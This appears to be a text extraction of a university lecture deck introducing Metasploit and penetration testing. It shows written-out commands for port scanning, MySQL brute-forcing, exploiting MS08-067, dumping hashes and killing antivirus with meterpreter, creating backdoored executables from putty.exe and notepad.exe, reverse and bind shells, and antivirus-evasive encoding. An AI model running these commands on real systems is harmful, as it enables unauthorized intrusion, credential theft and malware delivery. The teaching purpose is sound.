Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Metasploit: Pwnage and Ponies
1. The Metasploit Framework
● Vast collection of exploits, payloads and encoders.
● Modules for vulnerability scanning and information gathering.
● Modules for exploitation and session management.
● Modules for post exploitation, pivoting and getting all up in ur base.
2. Basics
Exploits and Payloads
By exploiting part of a system you interact with it in a manner not anticipated by the developers with
the end goal of getting your own code(payload)/logic to execute.
Pentesting == Legal Le Hacking
● PTES
● Watered down process
○ Information Gathering
■ port scans, service enumeration, mapping the attack vector.
■ Testing payloads against AV, making sure everything is ready.
○ Exploitation
■ Attacking hosts.
■ Compromise from any angle.
○ Post Exploitation
■ Pivot -> back to information gathering -> Exploitation
● This time should be faster
● Password re-use
● Passwords to crack
● pass the hash/token
● You might already have DA, so just go and find what you're after.
3. Different kinds of Pentest
● Web Applications
○ See OWASP
○ SQLi, XSS, Csrf, directory traversal, broken authentication, session
management, access controls, reflected attacks, breaking application
logic, client side attacks, information disclosure
● Footprint
○ What hosts/services are visible to public networks, information
disclosure, forgotten hosts, incorrectly configured hardware.
● Infrastructure
○ Attacking hosts on a network, often internal to an organization or hosts
found during the footprint.
○ Targeting hosts - OS and services (out dated/unpatched), weak
password, incorrectly configured applications, zero days.
○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities
4. nmap primer
● nmap is a port scanner and OS/service fingerprinting tool.
● It has become even more, welcome the NSE
○ Vuln checking and much more.
Basic Scanning:
nmap -sS 10.0.0.1-100 -p80
nmap -sS -O -A 10.0.0.55
nmap -oX - 10.0.0.1/24
In msfconsole (once you have a database connected)
msf > db_connect <username>:<password>@127.0.0.1/my_msf_db
Check that you are connected by using:
msf > db_status
db_nmap <options>
5. Interacting with Metasploit
msfconsole
Most used, feature rich, well supported. This is where the magic happens, make sure you run it as
root.
root@bt5:/# msfconsole
msf >
msfcli
Focused towards scripting and interaction with other command line tools. Sexy one liners.
armitage
The metasploit GUI, nice for fuzzing but lets stick to msfconsole.
Some of the other components you might use:
msfpayload, msfencode, msfvenom
Other bits of awesome:
karmasploit, SET, Wmap
6. Metasploit DB
First create a user and database
root@bt5:/# su postgres
postgres@bt5:/# createuser foobar -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@bt5:/# createdb --owner=foobar foo_db
Then in msfconsole conenct to the database
msf > db_connect foobar:<password>@127.0.0.1/foo_db
From now on you can work with the database in msfconsole, db_nmap will save nmap results to the
database automaticly
7. Basic Commands
● use <module>
○ info
○ show options
○ set <option> <value>
● show
○ payloads
○ exploits
○ auxiliary
○ options
● search
○ string that will make your day, "show vnc"
● back
8. Brute Force Attacks
Lets do a brute force dictionary attack on mysql server(s)
First step is to find hosts running mysql
nmap -sV -p3306 --open <IP Range>
If that returns some hosts, you can target a specific one or if your lazy,
skip the nmap scan and do it directly with the metasploit mysql login scanner
msf > use auxiliary/scanner/mysql/mysql_login
msf > set USERPASS /home/me/short.txt
msf > set RHOSTS <IP || Range>
msf > exploit
9. Shellz
A shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel.
Bind Shell
A bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or
anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe
Reverse Shell
Creates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT,
this would stop you in your tracks if you tried to create a bind shell (unless you had already
compromised their router and setup port forwarding). So if your target does not have a publicly
accessible IP (but you do) use a reverse shell. NAT lolwut
Meterpreter Shell
The meta interpreter is a payload that provides complex and advanced functionality, all functions
loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of
built in features that will save you a lot of time and effort. Some useful meterpreter commands are
covered later, use the following for navigating sessions.
meterpreter > background
msf > sessions
msf > sessions -i <session #>
10. The Art of Exploitation
Information Gathering
msf > db_nmap -sS -O -A 192.168.24.134
Now lets check for MS08-067 since its running XP < sp 3
msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134
msf > vulns
11. The Art of Exploitation
Confirming vulnerability, ready exploit
msf > vulns showed us that the host was indeed vulnerable
[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-
4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack
Corruption,NSS-34476
Time to use our first exploit, first search for it:
msf > search ms08-067
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack
Corruption
Time to load the exploit:
msf > use exploit/windows/smb/ms08_067_netapi
Use show options || payloads to see the configuration options available.
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > show payloads
12. The Art of Exploitation
Configure the exploit
msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134
RHOST => 192.168.24.134
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options
Everything looks good, now run the exploit
13. The Art of Post Exploitation
Meterpreter commands of interest:
meterpreter > hashdump
meterpreter > shell
Current user, working directory and process ID
meterpreter > getuid
meterpreter > pwd
meterpreter > getpid
Now you can migrate to a more reliable process, although not really necessary in this case
meterpreter > ps
meterpreter > migrate <pid>
Some fun
meterpreter > screenshot
meterpreter > run vnc
meterpreter > run killav
14. MSFpayload
Used to create payloads on their own, sharing is caring.
msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe
Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to
launch in a separate thread (does not work with all executables, test, test, test)
root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o
var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
15. Multi-handler
● You have a payload
● The user will execute it (or you might) How do you handle the connection?
● Welcome to the multi-handler.
root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15
LPORT=6666 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.0.0.15:6666
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)
C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :)
Make sure the payload matches the one you created with msfpayload
16. MSFencode
● Anti-Virus Evasion
● IDS Evasion
● Taking care of bad characters in your shellcode
○ x00 and xff
Show list of encoders:
msfencode -l
when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only
encoder that has been rated Excellent.
You can have multiple encoding runs:
msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R |
msfencode -e x86/shikata_ga_nai -c 5 -t raw |
msfencode -e x86/alpha_upper -c 2 -t raw |
... Keep on Shuffling ... |
msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
17. Hiding in plain sight
Custom Executable Templates
● msfpayload embeds payload into a default executable template (data/templates/template.exe)
● While this template does change from time to time, AV companies check it.
● You can however use any windows executable in place of the default.
○ Use the -x option
msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o
/var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5
Packers
Tool that compresses an executable and combines it with decompression code.
root@bt:/# upx -5 /var/www/payload.exe
18. Don't be stupid
Pwnage is awesome
● getting shellz rock.
● realising you have remote code execution in a service is better than coke.
● Dumping hashes and cracking them makes you laugh.
Getting caught is kak
● and you will get caught *cough* Sabu *cough* if you mess with systems
without authorization.
● Having Bubba as a cellmate WILL be uncomfortable.
● No one likes a show off.
● Getting kicked out of university is counter productive and ill advised.
● So...
DON'T BE STUPID